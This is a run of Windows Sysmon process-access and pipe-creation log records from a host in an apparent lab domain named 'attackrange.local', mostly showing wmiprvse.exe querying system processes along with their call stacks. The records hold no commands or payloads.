16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002236528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340\PSHost.132591775717293990.5340.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002236527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-71AA-00000000AD01}8992C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-71AA-00000000AD01}8992C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-71AA-00000000AD01}89924092C:\Windows\system32\conhost.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657